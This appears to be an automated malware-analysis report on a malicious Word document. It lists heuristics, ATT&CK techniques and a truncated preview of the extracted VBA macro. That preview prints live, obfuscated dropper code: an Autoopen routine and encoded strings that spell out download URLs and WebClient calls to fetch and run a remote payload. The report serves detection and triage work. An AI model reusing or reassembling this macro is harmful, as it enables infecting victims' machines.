MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical heuristic indicating an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6546187-0' further supports its nature as a dropper. The macro's obfuscated nature and the presence of the Shell() call suggest it is designed to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546148-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546148-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 137834 bytes |
SHA-256: 7a4a94a5cb6cf61591a02627dcf583c4bee4513e2e4555449a5b4e648df41270 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "rdDSmpfqaDQY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZpLErQ(JsQGF)
SzNSA = jdWCc
wZlDAw = mjjXMU + CDbl(73044 - PwbMH - zYnBv + CDbl(1868)) - 25848 - CDbl(20421)
DnjIu = lGrRXS
lbBwO = 6488
End Sub
Sub ivpVW(BwBFzV)
QdkdLr = isjvjG
nLzzmK = oIzNlz + CDbl(79699 - FlUBqF - rYmWb + CDbl(75105)) - 74308 - CDbl(21345)
lQUNnB = LLicU
PZumrm = 96320
hPXfTb = PiGBz
bVcbw = dIqId + CDbl(75661 - IMcpv - NTDAwi + CDbl(37584)) - 50079 - CDbl(94071)
dcaXln = RKsjU
rHtrQ = 35821
nsLBki = Ujtfd
NNjCPS = IKfCQ + CDbl(86381 - MtCqD - wIkRZ + CDbl(75057)) - 4076 - CDbl(30479)
lRNFnF = brbzzq
NIlrhL = 51984
End Sub
Sub CcWiEc(dcQFY)
NoKFv = SLOFJI
XInvUE = IPljE + CDbl(632 - MOwhs - EzTal + CDbl(73116)) - 57182 - CDbl(16623)
nWMaa = GphwB
QwDbB = 91373
GwQXRq = XoMKia
pcOXi = wFZRlr + CDbl(4203 - AQzkqz - VXzuj + CDbl(99967)) - 64217 - CDbl(33641)
XNaPaW = DWVjAX
maolWY = 25398
End Sub
Sub Autoopen()
On Error Resume Next
rczUE = dvaPo
uXQmOi = wNVNCw + CDbl(47443 - TuOKs - zWzRG + CDbl(33669)) - 49645 - CDbl(51097)
vULaEP = BXszR
WPvVj = 5300
ZAKOqSA (ALEvh + BoXpINiVkY + BSVIMB)
lasqY = zJtrR
wkziWk = XRbjQQ + CDbl(86230 - NrjPf - vbwWFw + CDbl(22655)) - 10196 - CDbl(675)
UmAjM = kwXbi
JrcZf = 25472
End Sub
Sub RMbmwC(DMRnZ)
QUOdP = vMHhs
SrRFt = RwVjut + CDbl(397 - jCwXh - CMnocz + CDbl(19414)) - 42467 - CDbl(35039)
Jijij = rwSlW
whaVdO = 55277
OjzIBF = dcuVv
wZPJRV = LzFwM + CDbl(52661 - GOHVv - aIZiah + CDbl(51109)) - 15394 - CDbl(27606)
YQbuz = KLLsH
OiDwap = 95097
UYZBG = zlikuN
ihfljS = EvKClt + CDbl(89638 - aiHlKA - zrZoH + CDbl(16319)) - 48811 - CDbl(55745)
wujkzY = tWzKY
WQMvE = 19418
End Sub
Sub dJCzd(nLsLpi)
iErKK = CTNOKp
lVJcME = Yworl + CDbl(13847 - kzALK - FfRYBk + CDbl(10845)) - 14854 - CDbl(69896)
vrHAw = CQwlP
kPAYDj = 34098
End Sub
Attribute VB_Name = "MDAKWFDlac"
Sub Hoitzi(SRwkN)
PLvBX = hWpPCs
wirPRp = mIFBW + CDbl(1336 - wQzYcp - vKJBNz + CDbl(89838)) - 54223 - CDbl(33796)
jBIib = CfurmH
tfXik = 12043
End Sub
Function BoXpINiVkY()
On Error Resume Next
raCPAU = NEsbKq
VUsLVo = shwooE + CDbl(30775 - pOKVb - FzshHu + CDbl(79913)) - 51897 - CDbl(5065)
cQZYK = WPRtwt
bMQRq = 27674
vqdSi = AAItW
Xcdqa = uKOion + CDbl(34171 - ThIai - qYXDU + CDbl(18206)) - 35114 - CDbl(47558)
crBZvI = QqsTYJ
QBqBi = 87545
btWzfMZ = ombRc("Kke//:0BO+0BOp0BO'+'+0BOtth 0BO+0BO VB00BO+0BO 0BO+0BO= XCDAW8C0BO+'+'0BO;)33120BO+0BO82zLa%", 37547 + 5 - 37547, 37547 + 86 - 37547)
riPNf = FZVRPW
lnnNW = fQShKl + CDbl(63567 - GBiIn - ilImMQ + CDbl(18208)) - 66655 - CDbl(82836)
bECwW = OdijOC
BEbwi = 97203
YEFwzk = jtEmP
nnElJj = sNlnFW + CDbl(14821 - UTsRp - RaSbG + CDbl(4777)) - 20259 - CDbl(69758)
jYzWj = ZnLoEi
TRtcd = 8923
vUmpviOb = ombRc("IIlxUK/ku.oc.0BO+0BOt0BO+0BOfos0BO+0BOegami/0BO+0BO/:0BO+0BOptth@/'+'0BO+0BOd4ojLj/0BO'+'+0BOed0BO+0BO.0BO+0BOepp0BO+0BOurg0BO+0BO-y0BO+0BOs0BO+0BOaOYLP1", 45162 + 6 - 45162, 45162 + 146 - 45162)
aLUab = NlKDj
IrBOI = bIujh + CDbl(55513 - ZGGAhd - FUuYD + CDbl(43731)) - 88924 - CDbl(19821)
ncIHoa = SCkcB
UudrqC = 30468
wGzim = mJpomo
NPUJQ = zZHstI + CDbl(27046 - JoOCcq - Tjiuz + CDbl(34047)) - 795 - CDbl(76591)
KSZFco = jEoNrr
DWYwd = 39464
zGnPfmZS = ombRc("CaO0+VB0xe.VB00BO+0BO( + 0BO+0BOBSN0BO+0BOW0BO+0BO8C0BO+0BO 0BO+0BO+0BO+0NW9c%", 12796 + 6 - 12796, 12796 + 71 - 12796)
mJwEtj = PTLwlO
biIHVG = wocVcS + CDbl(58331 - YSWTR - JaAjE + CDbl(90685)) - 31970 - CDbl(70656)
OFcjcn = rINso
VjQQI = 83864
AIVCz = dzzCJ
RETYaH = jbROQd + CDbl(63668 - jfruO - ClIrJ + CDbl(47566)) - 33635 - CDbl(239)
sCTsb = HDBOU
djuFZ = 34845
LfkcQRBfwv = ombRc("afhe0B'+'O+0BOi0BO+0BOlCbeW.teN.0BO+0BOm'+'0BO+0BOetsy0BO+0BOS )VB0tcejb0BO'+'+0BOo-VB0BLljIN3", 89786 + 7 - 89786, 89786 + 85 - 89786)
uRGHu = PTLjQ
ijUYLw = Fjcbpj + CDbl(88600 - YBOlk - LGpmu + CDbl(46690)) - 54315 - CDbl(22099)
wWk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.